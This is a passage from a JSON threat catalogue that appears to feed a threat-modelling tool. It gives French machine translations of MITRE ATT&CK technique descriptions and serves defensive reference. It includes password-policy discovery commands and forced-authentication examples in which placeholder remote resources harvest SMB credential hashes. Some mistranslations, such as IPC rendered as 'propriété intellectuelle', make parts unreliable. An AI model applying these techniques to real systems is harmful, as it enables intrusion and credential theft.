Model](https://attack.mitre.org/techniques/T1559/001). Les environnements Linux prennent en charge plusieurs m\u00e9canismes IPC diff\u00e9rents, dont deux sont des sockets et des tuyaux. (R\u00e9f\u00e9rence : Linux IPC) Les supports d\u2019ex\u00e9cution de niveau sup\u00e9rieur, tels que ceux des [interpr\u00e9teurs de commandes et de scripts](https://attack.mitre.org/techniques/T1059), peuvent \u00e9galement tirer parti des m\u00e9canismes de la CIB sous-jacents. Les adversaires peuvent \u00e9galement utiliser [les services distants](https://attack.mitre.org/techniques/T1021) tels que [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) pour faciliter l\u2019ex\u00e9cution de la propri\u00e9t\u00e9 intellectuelle \u00e0 distance. (Citation: Fireeye Hunting COM juin 2019)\nhttps://attack.mitre.org/techniques/T1559\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1001 - Obscurcissement des donn\u00e9es", - "description": "Les adversaires peuvent obscurcir le trafic de commandement et de contr\u00f4le pour le rendre plus difficile \u00e0 d\u00e9tecter. Les communications de commande et de contr\u00f4le (C2) sont masqu\u00e9es (mais pas n\u00e9cessairement chiffr\u00e9es) dans le but de rendre le contenu plus difficile \u00e0 d\u00e9couvrir ou \u00e0 d\u00e9chiffrer et de rendre la communication moins visible et de cacher les commandes de la vue. Cela englobe de nombreuses m\u00e9thodes, telles que l\u2019ajout de donn\u00e9es ind\u00e9sirables au trafic de protocole, l\u2019utilisation de la st\u00e9ganographie ou l\u2019usurpation d\u2019identit\u00e9 de protocoles l\u00e9gitimes.\nhttps://attack.mitre.org/techniques/T1001\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1039 - Donn\u00e9es du lecteur partag\u00e9 r\u00e9seau", - "description": "Les adversaires peuvent rechercher des partages r\u00e9seau sur des ordinateurs qu\u2019ils ont compromis pour trouver des fichiers d\u2019int\u00e9r\u00eat. Les donn\u00e9es sensibles peuvent \u00eatre collect\u00e9es \u00e0 partir de syst\u00e8mes distants via des lecteurs r\u00e9seau partag\u00e9s (r\u00e9pertoire partag\u00e9 h\u00f4te, serveur de fichiers r\u00e9seau, etc.) accessibles \u00e0 partir du syst\u00e8me actuel avant l\u2019exfiltration. Des shells de commande interactifs peuvent \u00eatre utilis\u00e9s et des fonctionnalit\u00e9s communes dans [cmd](https://attack.mitre.org/software/S0106) peuvent \u00eatre utilis\u00e9es pour collecter des informations.\nhttps://attack.mitre.org/techniques/T1039\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1601 - Modifier l\u2019image syst\u00e8me", - "description": "Les adversaires peuvent apporter des modifications au syst\u00e8me d\u2019exploitation des p\u00e9riph\u00e9riques r\u00e9seau embarqu\u00e9s pour affaiblir les d\u00e9fenses et fournir de nouvelles capacit\u00e9s pour eux-m\u00eames. Sur ces appareils, les syst\u00e8mes d\u2019exploitation sont g\u00e9n\u00e9ralement monolithiques et la plupart des fonctionnalit\u00e9s et capacit\u00e9s de l\u2019appareil sont contenues dans un seul fichier. Pour modifier le syst\u00e8me d\u2019exploitation, l\u2019adversaire n\u2019a g\u00e9n\u00e9ralement besoin que d\u2019affecter ce fichier, en le rempla\u00e7ant ou en le modifiant. Cela peut \u00eatre fait en direct en m\u00e9moire pendant l\u2019ex\u00e9cution du syst\u00e8me pour un effet imm\u00e9diat, ou en stockage pour impl\u00e9menter la modification au prochain d\u00e9marrage du p\u00e9riph\u00e9rique r\u00e9seau.\nhttps://attack.mitre.org/techniques/T1601\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1574 - Flux d\u2019ex\u00e9cution de d\u00e9tournement", - "description": "Les adversaires peuvent ex\u00e9cuter leurs propres charges utiles malveillantes en piratant la fa\u00e7on dont les syst\u00e8mes d\u2019exploitation ex\u00e9cutent les programmes. Le flux d\u2019ex\u00e9cution de d\u00e9tournement peut \u00eatre \u00e0 des fins de persistance, car cette ex\u00e9cution d\u00e9tourn\u00e9e peut se reproduire au fil du temps. Les adversaires peuvent \u00e9galement utiliser ces m\u00e9canismes pour \u00e9lever des privil\u00e8ges ou \u00e9chapper aux d\u00e9fenses, telles que le contr\u00f4le des applications ou d\u2019autres restrictions d\u2019ex\u00e9cution. Il existe de nombreuses fa\u00e7ons pour un adversaire de d\u00e9tourner le flux d\u2019ex\u00e9cution, notamment en manipulant la fa\u00e7on dont le syst\u00e8me d\u2019exploitation localise les programmes \u00e0 ex\u00e9cuter. La fa\u00e7on dont le syst\u00e8me d\u2019exploitation localise les biblioth\u00e8ques \u00e0 utiliser par un programme peut \u00e9galement \u00eatre intercept\u00e9e. Les emplacements o\u00f9 le syst\u00e8me d\u2019exploitation recherche des programmes/ressources, tels que les r\u00e9pertoires de fichiers et, dans le cas de Windows, le Registre, peuvent \u00e9galement \u00eatre empoisonn\u00e9s pour inclure des charges utiles malveillantes.\nhttps://attack.mitre.org/techniques/T1574\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1078 - Comptes valides", - "description": "Les adversaires peuvent obtenir et abuser des informations d\u2019identification de comptes existants afin d\u2019obtenir un acc\u00e8s initial, une persistance, une escalade de privil\u00e8ges ou une \u00e9vasion de la d\u00e9fense. Les informations d\u2019identification compromises peuvent \u00eatre utilis\u00e9es pour contourner les contr\u00f4les d\u2019acc\u00e8s plac\u00e9s sur diverses ressources sur les syst\u00e8mes du r\u00e9seau et peuvent m\u00eame \u00eatre utilis\u00e9es pour un acc\u00e8s persistant aux syst\u00e8mes distants et aux services disponibles en externe, tels que les VPN, Outlook Web Access, les p\u00e9riph\u00e9riques r\u00e9seau et le Bureau \u00e0 distance. (R\u00e9f\u00e9rence : volexity_0day_sophos_FW) Les informations d\u2019identification compromises peuvent \u00e9galement accorder \u00e0 un adversaire des privil\u00e8ges accrus sur des syst\u00e8mes sp\u00e9cifiques ou l\u2019acc\u00e8s \u00e0 des zones restreintes du r\u00e9seau. Les adversaires peuvent choisir de ne pas utiliser de logiciels malveillants ou d\u2019outils en conjonction avec l\u2019acc\u00e8s l\u00e9gitime fourni par ces informations d\u2019identification pour rendre plus difficile la d\u00e9tection de leur pr\u00e9sence. Dans certains cas, les adversaires peuvent abuser des comptes inactifs : par exemple, ceux appartenant \u00e0 des personnes qui ne font plus partie d\u2019une organisation. L\u2019utilisation de ces comptes peut permettre \u00e0 l\u2019adversaire d\u2019\u00e9chapper \u00e0 la d\u00e9tection, car l\u2019utilisateur du compte d\u2019origine ne sera pas pr\u00e9sent pour identifier toute activit\u00e9 anormale se d\u00e9roulant sur son compte. (Citation: CISA MFA PrintNightmare) Le chevauchement des autorisations pour les comptes locaux, de domaine et cloud sur un r\u00e9seau de syst\u00e8mes est pr\u00e9occupant car l\u2019adversaire peut \u00eatre en mesure de pivoter entre les comptes et les syst\u00e8mes pour atteindre un niveau d\u2019acc\u00e8s \u00e9lev\u00e9 (c\u2019est-\u00e0-dire administrateur de domaine ou d\u2019entreprise) pour contourner les contr\u00f4les d\u2019acc\u00e8s d\u00e9finis au sein de l\u2019entreprise. (Citation : Vol d\u2019informations d\u2019identification TechNet)\nhttps://attack.mitre.org/techniques/T1078\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1571 - Port non standard", - "description": "Les adversaires peuvent communiquer \u00e0 l\u2019aide d\u2019un protocole et d\u2019un couplage de ports qui ne sont g\u00e9n\u00e9ralement pas associ\u00e9s. Par exemple, HTTPS sur le port 8088 (Citation: Symantec Elfin Mar 2019) ou le port 587 (Citation: Fortinet Agent Tesla avril 2018) par opposition au port traditionnel 443. Les adversaires peuvent apporter des modifications au port standard utilis\u00e9 par un protocole pour contourner le filtrage ou embrouiller l\u2019analyse/l\u2019analyse des donn\u00e9es r\u00e9seau. Les adversaires peuvent \u00e9galement apporter des modifications aux syst\u00e8mes des victimes pour abuser des ports non standard. Par exemple, les cl\u00e9s de Registre et d\u2019autres param\u00e8tres de configuration peuvent \u00eatre utilis\u00e9s pour modifier les appariements de protocole et de port. (R\u00e9f\u00e9rence : change_rdp_port_conti)\nhttps://attack.mitre.org/techniques/T1571\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1068 - Exploitation pour l\u2019escalade des privil\u00e8ges", - "description": "Les adversaires peuvent exploiter les vuln\u00e9rabilit\u00e9s logicielles pour tenter d\u2019\u00e9lever les privil\u00e8ges. L\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 logicielle se produit lorsqu\u2019un adversaire profite d\u2019une erreur de programmation dans un programme, un service ou dans le logiciel ou le noyau du syst\u00e8me d\u2019exploitation lui-m\u00eame pour ex\u00e9cuter du code contr\u00f4l\u00e9 par l\u2019adversaire. Les constructions de s\u00e9curit\u00e9 telles que les niveaux d\u2019autorisation entravent souvent l\u2019acc\u00e8s \u00e0 l\u2019information et l\u2019utilisation de certaines techniques, de sorte que les adversaires devront probablement effectuer une escalade des privil\u00e8ges pour inclure l\u2019utilisation de logiciels d\u2019exploitation pour contourner ces restrictions. Lors de l\u2019acc\u00e8s initial \u00e0 un syst\u00e8me, un adversaire peut op\u00e9rer dans un processus \u00e0 privil\u00e8ges inf\u00e9rieurs, ce qui l\u2019emp\u00eachera d\u2019acc\u00e9der \u00e0 certaines ressources du syst\u00e8me. Des vuln\u00e9rabilit\u00e9s peuvent exister, g\u00e9n\u00e9ralement dans les composants du syst\u00e8me d\u2019exploitation et les logiciels fonctionnant g\u00e9n\u00e9ralement avec des autorisations plus \u00e9lev\u00e9es, qui peuvent \u00eatre exploit\u00e9es pour obtenir des niveaux d\u2019acc\u00e8s plus \u00e9lev\u00e9s sur le syst\u00e8me. Cela pourrait permettre \u00e0 quelqu\u2019un de passer d\u2019autorisations non privil\u00e9gi\u00e9es ou de niveau utilisateur \u00e0 des autorisations SYSTEM ou root en fonction du composant vuln\u00e9rable. Cela peut \u00e9galement permettre \u00e0 un adversaire de passer d\u2019un environnement virtualis\u00e9, tel qu\u2019une machine virtuelle ou un conteneur, \u00e0 l\u2019h\u00f4te sous-jacent. Cela peut \u00eatre une \u00e9tape n\u00e9cessaire pour un adversaire compromettant un syst\u00e8me de point de terminaison qui a \u00e9t\u00e9 correctement configur\u00e9 et limite les autres m\u00e9thodes d\u2019escalade des privil\u00e8ges. Les adversaires peuvent amener un pilote vuln\u00e9rable sign\u00e9 sur une machine compromise afin qu\u2019ils puissent exploiter cette vuln\u00e9rabilit\u00e9 pour ex\u00e9cuter du code en mode noyau. Ce processus est parfois appel\u00e9 Bring Your Own Vulnerable Driver (BYOVD). (Citation: ESET InvisiMole juin 2020) (Citation: Unit42 AcidBox juin 2020) Les adversaires peuvent inclure le pilote vuln\u00e9rable avec des fichiers livr\u00e9s lors de l\u2019acc\u00e8s initial ou le t\u00e9l\u00e9charger sur un syst\u00e8me compromis via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) ou [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).\nhttps://attack.mitre.org/techniques/T1068\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1531 - Suppression de l\u2019acc\u00e8s au compte", - "description": "Les adversaires peuvent interrompre la disponibilit\u00e9 des ressources syst\u00e8me et r\u00e9seau en emp\u00eachant l\u2019acc\u00e8s aux comptes utilis\u00e9s par les utilisateurs l\u00e9gitimes. Les comptes peuvent \u00eatre supprim\u00e9s, verrouill\u00e9s ou manipul\u00e9s (par exemple, des informations d\u2019identification modifi\u00e9es) pour supprimer l\u2019acc\u00e8s aux comptes. Les adversaires peuvent \u00e9galement par la suite se d\u00e9connecter et/ou effectuer un [arr\u00eat du syst\u00e8me/red\u00e9marrage] (https://attack.mitre.org/techniques/T1529) pour mettre en place des modifications malveillantes. (Citation: CarbonBlack LockerGoga 2019) (Citation: Unit42 LockerGoga 2019) Dans Windows, les applets de commande [Net](https://attack.mitre.org/software/S0039) Set-LocalUser et Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) peuvent \u00eatre utilis\u00e9es par des adversaires pour modifier des comptes d\u2019utilisateurs. Sous Linux, l\u2019utilitaire passwd peut \u00eatre utilis\u00e9 pour modifier les mots de passe. Les comptes peuvent \u00e9galement \u00eatre d\u00e9sactiv\u00e9s par la strat\u00e9gie de groupe. Les adversaires qui utilisent un ran\u00e7ongiciel ou des attaques similaires peuvent d\u2019abord adopter ce comportement et d\u2019autres comportements d\u2019impact, tels que [Data Destruction](https://attack.mitre.org/techniques/T1485) et [Defacement](https://attack.mitre.org/techniques/T1491), afin d\u2019emp\u00eacher la r\u00e9ponse/la r\u00e9cup\u00e9ration des incidents avant d\u2019atteindre l\u2019objectif [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).\nhttps://attack.mitre.org/techniques/T1531\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1027 - Fichiers ou informations obscurcis", - "description": "Les adversaires peuvent tenter de rendre un ex\u00e9cutable ou un fichier difficile \u00e0 d\u00e9couvrir ou \u00e0 analyser en chiffrant, encodant ou obscurcissant son contenu sur le syst\u00e8me ou en transit. Il s\u2019agit d\u2019un comportement courant qui peut \u00eatre utilis\u00e9 sur diff\u00e9rentes plates-formes et sur le r\u00e9seau pour \u00e9chapper aux d\u00e9fenses. Les charges utiles peuvent \u00eatre compress\u00e9es, archiv\u00e9es ou chiffr\u00e9es afin d\u2019\u00e9viter toute d\u00e9tection. Ces charges utiles peuvent \u00eatre utilis\u00e9es lors de l\u2019acc\u00e8s initial ou ult\u00e9rieurement pour att\u00e9nuer la d\u00e9tection. Parfois, l\u2019action d\u2019un utilisateur peut \u00eatre n\u00e9cessaire pour ouvrir et [D\u00e9obfusquer/D\u00e9coder des fichiers ou des informations] (https://attack.mitre.org/techniques/T1140) pour [Ex\u00e9cution de l\u2019utilisateur](https://attack.mitre.org/techniques/T1204). L\u2019utilisateur peut \u00e9galement \u00eatre tenu de saisir un mot de passe pour ouvrir un fichier compress\u00e9/chiffr\u00e9 prot\u00e9g\u00e9 par mot de passe fourni par l\u2019adversaire. (Citation : Volexity PowerDuke novembre 2016) Les adversaires peuvent \u00e9galement utiliser des scripts compress\u00e9s ou archiv\u00e9s, tels que JavaScript. Des parties de fichiers peuvent \u00e9galement \u00eatre encod\u00e9es pour masquer les cha\u00eenes de texte brut qui, autrement, aideraient les d\u00e9fenseurs \u00e0 la d\u00e9couverte. (Citation: Linux / Cdorked.A We Live Security Analysis) Les charges utiles peuvent \u00e9galement \u00eatre divis\u00e9es en fichiers distincts, apparemment b\u00e9nins, qui ne r\u00e9v\u00e8lent des fonctionnalit\u00e9s malveillantes que lorsqu\u2019ils sont r\u00e9assembl\u00e9s. (Citation : Carbon Black Obfuscation septembre 2016) Les adversaires peuvent \u00e9galement abuser de [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) pour masquer les commandes ex\u00e9cut\u00e9es \u00e0 partir de charges utiles ou directement via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Les variables d\u2019environnement, les alias, les caract\u00e8res et d\u2019autres s\u00e9mantiques sp\u00e9cifiques \u00e0 la plate-forme/au langage peuvent \u00eatre utilis\u00e9s pour \u00e9chapper aux d\u00e9tections bas\u00e9es sur les signatures et aux m\u00e9canismes de contr\u00f4le des applications. (Citation : FireEye Obfuscation juin 2017) (Citation : FireEye Revoke-Obfuscation juillet 2017) (Citation : PaloAlto EncodedCommand mars 2017)\nhttps://attack.mitre.org/techniques/T1027\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1201 - D\u00e9couverte de strat\u00e9gie de mot de passe", - "description": "Les adversaires peuvent tenter d\u2019acc\u00e9der \u00e0 des informations d\u00e9taill\u00e9es sur la strat\u00e9gie de mot de passe utilis\u00e9e dans un r\u00e9seau d\u2019entreprise ou un environnement cloud. Les strat\u00e9gies de mot de passe sont un moyen d\u2019appliquer des mots de passe complexes qui sont difficiles \u00e0 deviner ou \u00e0 d\u00e9chiffrer [Brute Force](https://attack.mitre.org/techniques/T1110). Ces informations peuvent aider l\u2019adversaire \u00e0 cr\u00e9er une liste de mots de passe courants et \u00e0 lancer des attaques par dictionnaire et / ou par force brute qui adh\u00e8rent \u00e0 la politique (par exemple, si la longueur minimale du mot de passe doit \u00eatre de 8, alors ne pas essayer des mots de passe tels que \u00ab\u00a0pass123\u00a0\u00bb; ne pas v\u00e9rifier plus de 3-4 mots de passe par compte si le verrouillage est r\u00e9gl\u00e9 sur 6 pour ne pas verrouiller les comptes). Les strat\u00e9gies de mot de passe peuvent \u00eatre d\u00e9finies et d\u00e9couvertes sur les syst\u00e8mes Windows, Linux et macOS via divers utilitaires de shell de commande tels que les comptes net (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, et pwpolicy getaccountpolicies (Citation : Superuser Linux Password Policies) (Citation : Jamf User Password Policies). Les adversaires peuvent \u00e9galement tirer parti d\u2019une [interface de ligne de commande de p\u00e9riph\u00e9rique r\u00e9seau](https://attack.mitre.org/techniques/T1059/008) sur les p\u00e9riph\u00e9riques r\u00e9seau pour d\u00e9couvrir des informations de strat\u00e9gie de mot de passe (par exemple, show aaa, show aaa common-criteria policy all). (R\u00e9f\u00e9rence : US-CERT-TA18-106A) Les strat\u00e9gies de mot de passe peuvent \u00eatre d\u00e9couvertes dans les environnements cloud \u00e0 l\u2019aide des API disponibles telles que GetAccountPasswordPolicy dans AWS (Citation : AWS GetPasswordPolicy).\nhttps://attack.mitre.org/techniques/T1201\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1546 - Ex\u00e9cution d\u00e9clench\u00e9e par un \u00e9v\u00e9nement", - "description": "Les adversaires peuvent \u00e9tablir des privil\u00e8ges de persistance et/ou \u00e9lever des privil\u00e8ges \u00e0 l\u2019aide de m\u00e9canismes syst\u00e8me qui d\u00e9clenchent l\u2019ex\u00e9cution en fonction d\u2019\u00e9v\u00e9nements sp\u00e9cifiques. Divers syst\u00e8mes d\u2019exploitation ont des moyens de surveiller et de s\u2019abonner \u00e0 des \u00e9v\u00e9nements tels que les ouvertures de session ou d\u2019autres activit\u00e9s utilisateur telles que l\u2019ex\u00e9cution d\u2019applications / binaires sp\u00e9cifiques. Les environnements cloud peuvent \u00e9galement prendre en charge diverses fonctions et services qui surveillent et peuvent \u00eatre invoqu\u00e9s en r\u00e9ponse \u00e0 des \u00e9v\u00e9nements cloud sp\u00e9cifiques. (Citation : Backdooring an AWS account) (Citation : Varonis Power Automate Data Exfiltration) (R\u00e9f\u00e9rence : Microsoft DART Case Report 001) Les adversaires peuvent abuser de ces m\u00e9canismes comme moyen de maintenir un acc\u00e8s persistant \u00e0 une victime en ex\u00e9cutant \u00e0 plusieurs reprises du code malveillant. Apr\u00e8s avoir acc\u00e9d\u00e9 \u00e0 un syst\u00e8me victime, les adversaires peuvent cr\u00e9er/modifier des d\u00e9clencheurs d\u2019\u00e9v\u00e9nements pour pointer vers du contenu malveillant qui sera ex\u00e9cut\u00e9 chaque fois que le d\u00e9clencheur d\u2019\u00e9v\u00e9nement est invoqu\u00e9. (R\u00e9f\u00e9rence : FireEye WMI 2015) (Citation : Persistance des logiciels malveillants sous OS X) (Citation : logiciel malveillant d\u2019amn\u00e9sie) \u00c9tant donn\u00e9 que l\u2019ex\u00e9cution peut \u00eatre transmise par proxy par un compte disposant d\u2019autorisations plus \u00e9lev\u00e9es, tel que des comptes SYSTEM ou de service, un adversaire peut \u00eatre en mesure d\u2019abuser de ces m\u00e9canismes d\u2019ex\u00e9cution d\u00e9clench\u00e9s pour augmenter ses privil\u00e8ges.\nhttps://attack.mitre.org/techniques/T1546\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1187 - Authentification forc\u00e9e", - "description": "Les adversaires peuvent recueillir des informations d\u2019identification en invoquant ou en for\u00e7ant un utilisateur \u00e0 fournir automatiquement des informations d\u2019authentification via un m\u00e9canisme dans lequel ils peuvent intercepter. Le protocole SMB (Server Message Block) est couramment utilis\u00e9 dans les r\u00e9seaux Windows pour l\u2019authentification et la communication entre les syst\u00e8mes pour l\u2019acc\u00e8s aux ressources et le partage de fichiers. Lorsqu\u2019un syst\u00e8me Windows tente de se connecter \u00e0 une ressource SMB, il tente automatiquement de s\u2019authentifier et d\u2019envoyer les informations d\u2019identification de l\u2019utilisateur actuel au syst\u00e8me distant. (Citation : Wikipedia Server Message Block) Ce comportement est typique dans les environnements d\u2019entreprise afin que les utilisateurs n\u2019aient pas besoin d\u2019entrer des informations d\u2019identification pour acc\u00e9der aux ressources r\u00e9seau. WebDAV (Web Distributed Authoring and Versioning) est \u00e9galement g\u00e9n\u00e9ralement utilis\u00e9 par les syst\u00e8mes Windows comme protocole de sauvegarde lorsque SMB est bloqu\u00e9 ou \u00e9choue. WebDAV est une extension de HTTP et fonctionne g\u00e9n\u00e9ralement sur les ports TCP 80 et 443. (Citation: Didier Stevens WebDAV Traffic) (Citation : Microsoft Managing WebDAV Security) Les adversaires peuvent tirer parti de ce comportement pour acc\u00e9der aux hachages de compte d\u2019utilisateur via l\u2019authentification SMB/WebDAV forc\u00e9e. Un adversaire peut envoyer une pi\u00e8ce jointe \u00e0 un utilisateur par spearphishing qui contient un lien de ressource vers un serveur externe contr\u00f4l\u00e9 par l\u2019adversaire (c\u2019est-\u00e0-dire [Injection de mod\u00e8le](https://attack.mitre.org/techniques/T1221)), ou placer un fichier sp\u00e9cialement con\u00e7u sur le chemin de navigation pour les comptes privil\u00e9gi\u00e9s (par exemple, . SCF plac\u00e9 sur le bureau) ou sur un partage accessible au public auquel la victime peut acc\u00e9der. Lorsque le syst\u00e8me de l\u2019utilisateur acc\u00e8de \u00e0 la ressource non approuv\u00e9e, il tente de s\u2019authentifier et envoie des informations, y compris les informations d\u2019identification hach\u00e9es de l\u2019utilisateur, via SMB au serveur contr\u00f4l\u00e9 par l\u2019adversaire. (Citation : GitHub Hashjacking) Avec l\u2019acc\u00e8s au hachage des informations d\u2019identification, un adversaire peut effectuer un craquage hors ligne [Brute Force](https://attack.mitre.org/techniques/T1110) pour acc\u00e9der aux informations d\u2019identification en texte brut. (Citation: Cylance Redirect to SMB) Cela peut se produire de diff\u00e9rentes fa\u00e7ons. (Citation : Osanda vole des hachages NetNTLM) Voici quelques sp\u00e9cificit\u00e9s de l\u2019utilisation dans la nature :* Une pi\u00e8ce jointe de spearphishing contenant un document avec une ressource qui est automatiquement charg\u00e9e lorsque le document est ouvert (c\u2019est-\u00e0-dire [Injection de mod\u00e8le](https://attack.mitre.org/techniques/T1221)). Le document peut inclure, par exemple, une requ\u00eate similaire \u00e0 file[:]//[remote address]/Normal.dotm pour d\u00e9clencher la requ\u00eate SMB. (Citation: US-CERT APT Energy Oct 2017)* A modifi\u00e9 . LNK ou . SCF dont le nom de fichier d\u2019ic\u00f4ne pointe vers une r\u00e9f\u00e9rence externe telle que \\\\[remote address]\\pic.png qui forcera le syst\u00e8me \u00e0 charger la ressource lorsque l\u2019ic\u00f4ne est rendue pour collecter \u00e0 plusieurs reprises les informations d\u2019identification. (Citation: US-CERT APT Energy Oct 2017)\nhttps://attack.mitre.org/techniques/T1187\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1599 - Pont des limites du r\u00e9seau", - "description": "Les adversaires peuvent franchir les limites du r\u00e9seau en compromettant les p\u00e9riph\u00e9riques de r\u00e9seau de p\u00e9rim\u00e8tre ou les p\u00e9riph\u00e9riques internes responsables de la segmentation du r\u00e9seau. La violation de ces p\u00e9riph\u00e9riques peut permettre \u00e0 un adversaire de contourner les restrictions sur le routage du trafic qui s\u00e9parent autrement les r\u00e9seaux approuv\u00e9s et non approuv\u00e9s. Les p\u00e9riph\u00e9riques tels que les routeurs et les pare-feu peuvent \u00eatre utilis\u00e9s pour cr\u00e9er des fronti\u00e8res entre les r\u00e9seaux approuv\u00e9s et non approuv\u00e9s. Ils y parviennent en limitant les types de trafic pour appliquer la politique organisationnelle dans le but de r\u00e9duire le risque inh\u00e9rent \u00e0 ces connexions. La restriction du trafic peut \u00eatre obtenue en interdisant les adresses IP, les ports de protocole de couche 4 ou par une inspection approfondie des paquets pour identifier les applications. Pour participer avec le reste du r\u00e9seau, ces dispositifs peuvent \u00eatre directement adressables ou transparents, mais leur mode de fonctionnement n\u2019a aucune incidence sur la fa\u00e7on dont l\u2019adversaire peut les contourner lorsqu\u2019il est compromis. Lorsqu\u2019un adversaire prend le contr\u00f4le d\u2019un tel dispositif de d\u00e9limitation, il peut contourner l\u2019application de sa politique pour faire passer le trafic normalement interdit \u00e0 travers la limite de confiance entre les deux r\u00e9seaux s\u00e9par\u00e9s sans entrave. En obtenant des droits suffisants sur l\u2019appareil, un adversaire peut reconfigurer l\u2019appareil pour autoriser le trafic qu\u2019il souhaite, ce qui lui permet d\u2019atteindre des objectifs tels que la commande et le contr\u00f4le via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) ou l\u2019exfiltration de donn\u00e9es via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Les adversaires peuvent \u00e9galement cibler les p\u00e9riph\u00e9riques internes responsables de la segmentation du r\u00e9seau et en abuser conjointement avec [Proxy interne](https://attack.mitre.org/techniques/T1090/001) pour atteindre les m\u00eames objectifs. (Citation : Kaspersky ThreatNeedle f\u00e9vrier 2021) Dans les cas o\u00f9 un dispositif frontalier s\u00e9pare deux organisations distinctes, l\u2019adversaire peut \u00e9galement faciliter le mouvement lat\u00e9ral dans de nouveaux environnements de victime.\nhttps://attack.mitre.org/techniques/T1599\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1486 - Donn\u00e9es chiffr\u00e9es pour avoir un impact", - "description": "Les adversaires peuvent chiffrer les donn\u00e9es sur les syst\u00e8mes cibles ou sur un grand nombre de syst\u00e8mes d\u2019un r\u00e9seau pour interrompre la disponibilit\u00e9 des ressources syst\u00e8me et r\u00e9seau. Ils peuvent tenter de rendre les donn\u00e9es stock\u00e9es inaccessibles en chiffrant des fichiers ou des donn\u00e9es sur des lecteurs locaux et distants et en refusant l\u2019acc\u00e8s \u00e0 une cl\u00e9 de d\u00e9chiffrement. Cela peut \u00eatre fait afin d\u2019obtenir une compensation mon\u00e9taire d\u2019une victime en \u00e9change d\u2019un d\u00e9cryptage ou d\u2019une cl\u00e9 de d\u00e9chiffrement (ransomware) ou de rendre les donn\u00e9es d\u00e9finitivement inaccessibles dans les cas o\u00f9 la cl\u00e9 n\u2019est pas enregistr\u00e9e ou transmise. (Citation: US-CERT Ransomware 2016) (Citation : FireEye WannaCry 2017) (Citation: US-CERT NotPetya 2017) (Citation: US-CERT SamSam 2018) Dans le cas des ran\u00e7ongiciels, il est typique que les fichiers utilisateur courants tels que les documents Office, les fichiers PDF, les images, les vid\u00e9os, l\u2019audio, le texte et les fichiers de code source soient chiffr\u00e9s (et souvent renomm\u00e9s et/ou \u00e9tiquet\u00e9s avec des marqueurs de fichiers sp\u00e9cifiques). Les adversaires peuvent avoir besoin d\u2019abord d\u2019employer d\u2019autres comportements, tels que [Modification des autorisations de fichiers et de r\u00e9pertoires](https://attack.mitre.org/techniques/T1222) ou [Arr\u00eat/Red\u00e9marrage du syst\u00e8me](https://attack.mitre.org/techniques/T1529), afin de d\u00e9verrouiller et/ou d\u2019acc\u00e9der \u00e0 la manipulation de ces fichiers. (Citation: CarbonBlack Conti juillet 2020) Dans certains cas, les adversaires peuvent chiffrer les fichiers syst\u00e8me critiques, les partitions de disque et le MBR. (Citation: US-CERT NotPetya 2017) Pour maximiser l\u2019impact sur l\u2019organisation cible, les logiciels malveillants con\u00e7us pour chiffrer les donn\u00e9es peuvent avoir des fonctionnalit\u00e9s de type ver pour se propager sur un r\u00e9seau en exploitant d\u2019autres techniques d\u2019attaque telles que [Comptes valides](https://attack.mitre.org/techniques/T1078), [Dumping des informations d\u2019identification du syst\u00e8me d\u2019exploitation](https://attack.mitre.org/techniques/T1003) et [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002). (Citation : FireEye WannaCry 2017) (Citation: US-CERT NotPetya 2017) Les logiciels malveillants de chiffrement peuvent \u00e9galement tirer parti de [D\u00e9gradation interne](https://attack.mitre.org/techniques/T1491/001), par exemple en changeant les fonds d\u2019\u00e9cran des victimes, ou en intimidant les victimes en envoyant des notes de ran\u00e7on ou d\u2019autres messages aux imprimantes connect\u00e9es (connu sous le nom de \u00ab bombardement d\u2019impression \u00bb). (Citation: NHS Digital Egregor Nov 2020) Dans les environnements cloud, les objets de stockage dans les comptes compromis peuvent \u00e9galement \u00eatre chiffr\u00e9s. (Citation: Rhino S3 Ransomware Partie 1)\nhttps://attack.mitre.org/techniques/T1486\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1553 - Subvertir les contr\u00f4les d\u2019approbation", - "description": "Les adversaires peuvent saper les contr\u00f4les de s\u00e9curit\u00e9 qui avertiront les utilisateurs d\u2019une activit\u00e9 non fiable ou emp\u00eacheront l\u2019ex\u00e9cution de programmes non fiables. Les syst\u00e8mes d\u2019exploitation et les produits de s\u00e9curit\u00e9 peuvent contenir des m\u00e9canismes permettant d\u2019identifier les programmes ou les sites Web comme poss\u00e9dant un certain niveau de confiance. Des exemples de telles fonctionnalit\u00e9s incluent un programme autoris\u00e9 \u00e0 s\u2019ex\u00e9cuter parce qu\u2019il est sign\u00e9 par un certificat de signature de code valide, un programme invitant l\u2019utilisateur avec un avertissement parce qu\u2019il a un attribut 